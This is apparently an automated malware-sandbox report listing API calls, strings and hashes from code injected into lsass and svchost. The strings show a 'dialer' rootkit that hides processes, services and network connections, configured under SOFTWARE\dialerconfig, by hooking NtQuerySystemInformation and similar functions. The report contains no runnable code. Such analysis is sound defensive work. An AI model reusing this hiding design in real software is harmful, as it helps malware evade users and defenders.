                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 3242871069-629598281
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: CallTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3163161869-2084237596
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: ierarchy Descriptor'$riptor at (
                                                                      • API String ID: 592178966-758928094
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2577045391.000002A2911C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A2911C0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a2911c0000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: __std_exception_copy
                                                                      • String ID: Locator'$riptor at (
                                                                      • API String ID: 592178966-4215709766
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000022.00000002.2579322807.000002A291990000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A291990000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_34_2_2a291990000_lsass.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1617791916-0
                                                                      Memory Dump Source
                                                                      • Source File: 00000025.00000002.1422062977.00007FF7CBC81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CBC80000, based on PE: true
                                                                      • Associated: 00000025.00000002.1422010977.00007FF7CBC80000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422108040.00007FF7CBC94000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422221876.00007FF7CBC98000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422518778.00007FF7CBF17000.00000008.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422921466.00007FF7CC18D000.00000004.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422958258.00007FF7CC1C6000.00000002.00000001.01000000.00000004.sdmp
                                                                      • Associated: 00000025.00000002.1422991910.00007FF7CC1C9000.00000002.00000001.01000000.00000004.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_37_2_7ff7cbc80000_updater.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:

                                                                      Execution Graph

                                                                      Execution Coverage: 0.7%
                                                                      Dynamic/Decrypted Code Coverage: 0%
                                                                      Signature Coverage: 0%
                                                                      Total number of Nodes: 66
                                                                      Total number of Limit Nodes: 2

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                      • String ID:
                                                                      • API String ID: 1683269324-0

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 0000014E25ED1628: GetProcessHeap.KERNEL32 ref: 0000014E25ED1633
                                                                        • Part of subcall function 0000014E25ED1628: HeapAlloc.KERNEL32 ref: 0000014E25ED1642
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16B2
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED16DF
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED16F9
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1719
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1734
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1754
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED176F
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED178F
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17AA
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED17CA
                                                                      • Sleep.KERNEL32 ref: 0000014E25ED1AD7
                                                                      • SleepEx.KERNELBASE ref: 0000014E25ED1ADD
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED17E5
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1805
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1820
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED1840
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED185B
                                                                        • Part of subcall function 0000014E25ED1628: RegOpenKeyExW.ADVAPI32 ref: 0000014E25ED187B
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED1896
                                                                        • Part of subcall function 0000014E25ED1628: RegCloseKey.ADVAPI32 ref: 0000014E25ED18A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                      • String ID:
                                                                      • API String ID: 1534210851-0
                                                                      • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction ID: 4f9138a27f515c4560b724a4ce78d8a5789e6dff9fc277979641b626aa87eaa8
                                                                      • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                      • Instruction Fuzzy Hash: 4031BD7221264181EBD89B26DF51BE913EDBB8DBD4F0474219E0B876B6EE94C8518311

                                                                      Control-flow Graph (rendered graph not reproduced; blocks and edges recovered from it): 57: 14e25ed3844-14e25ed384f; 58: 14e25ed3869-14e25ed3870; 59: 14e25ed3851-14e25ed3864 (StrCmpNIW); 60: 14e25ed3866. Edges: 57->58, 57->59, 59->58, 59->60, 60->58.

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: dialer
                                                                      • API String ID: 0-3528709123
                                                                      • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction ID: 70b5d17667e6c287c63a42a861956bd54ed603b9f6973ac1a3c59364d2fced0b
                                                                      • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                                      • Instruction Fuzzy Hash: 8DD0A77433220586FF94DFE6AEC4EE423DCFB08764F985024CD02012B0DB988D8D9710

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad
                                                                      • String ID:
                                                                      • API String ID: 1029625771-0
                                                                      • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction ID: 61d15e7f8051c1c6ea22e4ab23ff41feee112f27c0d23cc355fd173832c7c0b5
                                                                      • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                      • Instruction Fuzzy Hash: F7615633F4229187DB54CF15CA40BADB3DAF755BA4F988121CE5A03798DA78D892C700

                                                                      Control-flow Graph (rendered graph not reproduced; blocks with API or internal calls recovered from it): entry 14e25ed2b2c-14e25ed2ba5 (call 14e25ef2ce0); 14e25ed2bc9-14e25ed2bd9 GetModuleHandleA; 14e25ed2bdb-14e25ed2beb GetProcAddress; 14e25ed2c14-14e25ed2c33 StrCmpNIW; 14e25ed2cb2-14e25ed2cbf and 14e25ed2dac-14e25ed2db8 call 14e25ed199c; 14e25ed2d3f-14e25ed2d49 and 14e25ed2dfa-14e25ed2e03 call 14e25ed1bbc; 14e25ed2d4b-14e25ed2d58 and 14e25ed2e05-14e25ed2e12 lstrlenW; 14e25ed2d66-14e25ed2d79 and 14e25ed2e20-14e25ed2e33 call 14e25ed152c; 14e25ed2d7b-14e25ed2d8d and 14e25ed2e35-14e25ed2e3f call 14e25ed3844 (the StrCmpNIW "dialer" routine above); 14e25ed2e63-14e25ed2e7d, 14e25ed2e85-14e25ed2ea3 and 14e25ed2eab-14e25ed2ec9 call 14e25ed85c0; common exit 14e25ed2ee0-14e25ed2f03.

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                      • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                      • API String ID: 2119608203-3850299575
                                                                      • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction ID: 5f587f22587abd1431a1499f71e10d14118b5f21938d0c7cdf4f0e995d43f0cd
                                                                      • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                      • Instruction Fuzzy Hash: 5AB1AD72222A5086EBE98F25DE40BE963EDFB46B94F046016EE0A577B4DFB5CC40C340
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3140674995-0
                                                                      • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction ID: a58b129de63e11622298d6c6a6695538686e417bbbb43f62ee147bc6e5dcd9c5
                                                                      • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                      • Instruction Fuzzy Hash: C5318272215B808AEBA09F60F840BED73B8F785754F54502ADB4E47BA9EF78C548C710
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction ID: 15f96c7993330800901423ecee5f9673b24142775bcc2ce8a9715945b3205e8b
                                                                      • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                      • Instruction Fuzzy Hash: 12318072215F8086DBA0CF25E940BDE73E8F78A764F541126EA9E43BA9DF78C545CB00

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                      • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                      • API String ID: 106492572-2879589442
                                                                      • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction ID: c1bc9262416f542b9bcf67935fbe76358c1d3776086d0358d464ba4c20ede195
                                                                      • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                      • Instruction Fuzzy Hash: 32713A76721A1086EBA09F61EA80ADD23EDFB89B98F002115DE4F47B39DFB8C544C340

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                      • String ID: d
                                                                      • API String ID: 2005889112-2564639436
                                                                      • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction ID: 7a8f22d71641694a9fd7ec0762583f57e8a0a7c965321d3c74b055877a6cee4e
                                                                      • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                      • Instruction Fuzzy Hash: F0516C72211B8486EB95CF62FA487AA77E9F389BE9F144124DA4A0772ADF7CC045C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread$AddressHandleModuleProc
                                                                      • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                      • API String ID: 4175298099-1975688563
                                                                      • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction ID: 8747b8a499e9052df40478483ed6c278368860711bb81c5df639d3b7e26418f2
                                                                      • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                      • Instruction Fuzzy Hash: 7031067462295AA0EB84EF65EF51FD863EEBB05358FD06017940B12176AFF8C249C390

                                                                      Control-flow Graph (rendered graph not reproduced; recovered from it): CRT DllMain/startup routine, entry 14e255d6910-14e255d6916, exit 14e255d6c1f-14e255d6c2c. Blocks call __scrt_dllmain_crt_thread_attach (14e255d6938), __scrt_dllmain_after_initialize_c (14e255d69de-14e255d69e5) and the internal routines 14e255d6fc0, 14e255d6e54, 14e255d6f04, 14e255d6f7c, 14e255d6e1c, 14e255d7318, 14e255d7130, 14e255d7154, 14e255d6fac, 14e255d7190, 14e255d6ec4, 14e255d72dc, 14e255d6e0c, 14e255d6e38, 14e255dac0c, 14e255dabc8, 14e255d7180, 14e255d7098, 14e255d268c, 14e255e5780 and 14e255d6a78; the routine calls itself at 14e255d6b63-14e255d6b78 and 14e255d6bd5-14e255d6bea.

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                      • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                      • API String ID: 190073905-1786718095
                                                                      • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction ID: 2332f7615c00a9b45a6cd8c5de408ca84be1c3b81a06dd6493736303431c435b
                                                                      • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                      • Instruction Fuzzy Hash: 9681D333E8264386FA509B659E41BD963DDFB87780F6880159A4B877B6DBFCC8478700

                                                                      Control-flow Graph (rendered graph not reproduced; the API call sites it showed are listed under APIs below): CRT per-thread data routine, entry 14e255edce28-14e25edce4a GetLastError, with FlsGetValue/FlsSetValue/SetLastError blocks and internal calls to 14e25edd6cc, 14e25edd744, 14e25edcb94 and 14e25edc748.

                                                                      APIs
                                                                      • GetLastError.KERNEL32 ref: 0000014E25EDCE37
                                                                      • FlsGetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE4C
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE6D
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCE9A
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEAB
                                                                      • FlsSetValue.KERNEL32(?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCEBC
                                                                      • SetLastError.KERNEL32 ref: 0000014E25EDCED7
                                                                      • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF0D
                                                                      • FlsSetValue.KERNEL32(?,?,00000001,0000014E25EDECCC,?,?,?,?,0000014E25EDBF9F,?,?,?,?,?,0000014E25ED7AB0), ref: 0000014E25EDCF2C
                                                                        • Part of subcall function 0000014E25EDD6CC: HeapAlloc.KERNEL32 ref: 0000014E25EDD721
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF54
                                                                        • Part of subcall function 0000014E25EDD744: HeapFree.KERNEL32 ref: 0000014E25EDD75A
                                                                        • Part of subcall function 0000014E25EDD744: GetLastError.KERNEL32 ref: 0000014E25EDD764
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF65
                                                                      • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000014E25EE0A6B,?,?,?,0000014E25EE045C,?,?,?,0000014E25EDC84F), ref: 0000014E25EDCF76
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast$Heap$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 570795689-0
                                                                      • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction ID: 0e38215d1457e59afe65eb01ec79511c82aee5c2ce1e14f3d06b2e4fe1cd1a9d
                                                                      • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                      • Instruction Fuzzy Hash: 69416F7025324485FAE9A7359F51BF962CEBB877F0F142B24A83B466F6DEE984014341

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                      • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                      • API String ID: 2171963597-1373409510
                                                                      • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction ID: f3f1b66307ed9429f7177bedba5dbcb25a8199bf3a3daf748d0c8febe8376095
                                                                      • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                      • Instruction Fuzzy Hash: 5321307262475082EB50CB25FA4479963E8F7897A4F500215DA5A02BB9CFBCC549CB00

                                                                      Control-flow Graph

                                                                      • Interactive graph of the function at 14e255d9944 (basic-block list not reproduced; every call in it goes to an internal address, no API calls)
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2575673989.0000014E255D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E255D0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e255d0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction ID: b2a34a7c217fcdebc7505ea3e7ea67a3eaa2ec335367fa87b754eea6f7af43be
                                                                      • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                      • Instruction Fuzzy Hash: CDE1E573A46B4286EB60DF65DA80BDD77F8F756B98F000115EE4A57BA9CB78C091C700

                                                                      Control-flow Graph

                                                                      • Interactive graph of the function at 14e25eda544 (basic-block list not reproduced; every call in it goes to an internal address, no API calls)
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000028.00000002.2576692221.0000014E25ED0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000014E25ED0000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_40_2_14e25ed0000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                      • String ID: csm$csm$csm
                                                                      • API String ID: 849930591-393685449
                                                                      • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
